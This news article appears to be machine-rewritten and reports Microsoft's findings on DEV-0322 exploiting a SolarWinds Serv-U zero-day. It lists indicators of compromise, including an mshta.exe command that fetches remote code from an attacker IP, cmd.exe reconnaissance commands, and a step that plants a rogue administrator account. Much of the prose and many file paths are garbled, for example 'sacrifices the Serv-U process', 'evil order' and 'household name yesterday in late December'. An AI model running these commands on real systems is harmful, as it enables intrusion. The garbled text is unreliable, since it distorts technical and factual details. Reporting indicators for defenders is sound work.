Microsoft said on Tuesday that hackers operating in China exploited zero -day vulnerabilities in SolarWinds products. According to Microsoft, the hackers were, most likely, targeting software companies and the U.S. Defense industry.
SolarWinds revealed day zero on Monday, after receiving a notification from Microsoft that it had learned that a previously unknown vulnerability in the SolarWinds Serv-U product line was being actively exploited. Austin, Texas -based SolarWinds did not provide details on the perpetrators of the threat behind the attack or how their attack was successful.
Commercial VPNs and user routers are compromised
On Tuesday, Microsoft said they designated the group of hackers for now as “DEV-0322.” “DEV” refers to the “development group” that was being studied before Microsoft researchers had high confidence about the origin or identity of the perpetrator behind the operation. The company says that the attackers are physically located in China and often rely on botnets made up of routers or other types of IoT devices.
“MSTIC has seen DEV-0322 targeting entities in the U.S. Defense Industrial Base Sector and software companies,” the researchers with the Microsoft Threat Intelligence Center wrote in a post. “This activity group is based in China and has been observed using commercial VPN solutions and harassing users in their attacker infrastructure.”
In addition to the three servers affiliated with the attacker that SolarWinds has revealed, Microsoft provides three additional clues that people can use to determine if they have been hacked. Compromise instructions are:
- hxxp: // 144[.]34[.]179[.]162 / a
- C: Windows Temp Serv-U.bat
- C: Windows Temp test current.dmp
- The presence of suspicious exception errors, especially in the DebugSocketlog.txt log file
- C: Windows System32 mshta.exe http: // 144[.]34[.]179[.]162 / a (broken)
- cmd.exe/c whoami> “./Client/Common/redacted.txt”
- cmd.exe / c dir> “. Client Common redacted.txt”
- cmd.exe / c “C: Windows Temp Serv-U.bat”
- Powerhell.exe C: Windows Temp Serv-U.bat
- cmd.exe / c type \ redacted redacted.Archive> “C: ProgramData RhinoSoft Serv-U Users Global Users redacted.Archive”
Tuesday’s post also provided new technical details about the attack. In particular:
We observed DEV-0322 inserting the output of their cmd.exe command into a file in the Serv-U Client Common folder, which is accessible from the internet by default, so that an attacker can retrieve the results of the command. The actors were also found to be adding new global users to Serv-U, effectively adding themselves as Serv-U administrators, by creating manually created .Archives in the Global Users directory. Serv-U user information is stored in this Archive file.
Due to the way DEV-0322s write their code, when an exploit successfully sacrifices the Serv-U process, an exception is generated and logged to the Serv-U log file, DebugSocketLog.txt. The process can also stop once an evil order is executed.
By studying telemetry, we identify the characteristics of exploitation, but not the underlying vulnerabilities. MSTIC works with Microsoft’s Attack Security Research team, which conducts vulnerability research on Serv-U binaries and identifies vulnerabilities through black box analysis. Once the root cause is found, we report the vulnerability to SolarWinds, which responds quickly to understand the problem and build patches.
The zero-day vulnerability, tracked as CVE-2021-35211, is in SolarWinds ’Serv-U product, which customers use to transfer files over the network. When SSH Serv-U hits the Internet, the exploit gives an attacker the ability to run malicious code remotely with high system privileges. From there, attackers can install and run malicious payloads, or they can view and modify data.
SolarWinds became a household name yesterday in late December when researchers discovered that it was the center of a supply chain attack with global reach. After compromising SolarWinds ’software manufacturing system, attackers used their access to drive malicious updates to about 18,000 customers of the company’s Orion network management tool.
Of those 18,000 customers, about nine of them in U.S. government agencies and about 100 of those in private industry receive follow -up software. The federal government has linked the attack to Russia’s Foreign Intelligence Service, abbreviated as SVR. For more than a decade, SVR has run malware campaigns targeting governments, political think tanks, and other organizations around the world.
The zero-day attacks found and reported by Microsoft were not related to the Orion supply chain attack.
SolarWinds addressed the vulnerability over the weekend. Anyone running a vulnerable version of Serv-U should immediately update and check for signs of compromise.